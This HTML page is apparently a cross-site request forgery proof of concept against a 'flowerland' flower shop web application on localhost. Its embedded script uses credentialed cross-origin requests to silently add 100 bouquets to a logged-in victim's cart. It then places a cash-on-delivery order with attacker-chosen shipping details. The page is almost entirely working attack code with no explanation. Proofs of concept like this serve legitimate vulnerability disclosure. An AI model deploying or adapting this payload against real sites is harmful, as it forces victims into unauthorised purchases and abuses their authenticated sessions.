
<body bgcolor="black">
<h1 style="color: gold">Poc of add product and buy them ^_^</h1>
<script>
    function sleep(milliseconds) {
    var start = new Date().getTime();
    for (var i = 0; i < 1e7; i++) {
        if ((new Date().getTime() - start) > milliseconds){
            break;
            }
        }
    }
    var cart = "product_quantity=100&product_name=Arrangement+of+Alstroemeria%2C+eustoma+and+snowball&product_price=420&product_image=flower10.png&add_to_cart=add+to+cart"; 
    var forTheCart = new XMLHttpRequest(); var forTheCheckout = new XMLHttpRequest();
    forTheCart.open("post", "http://localhost:8077/flowerland/shop.php"); 
    forTheCart.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    forTheCart.withCredentials = true;
    forTheCart.send(cart); 
    sleep(2000);
    var order = "name=attacker&number=0323456789&email=att4cker@gmail.com&method=cash+on+delivery&flat=1337&street=1337&city=valhala&state=land+of+ragnar&country=nowhere&pin_code=012345&order_btn=place+order"; 
    forTheCheckout.open("post", "http://localhost:8077/flowerland/checkout.php"); 
    forTheCheckout.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    forTheCheckout.withCredentials = true;
    forTheCheckout.send(order); 
</script> 
</body>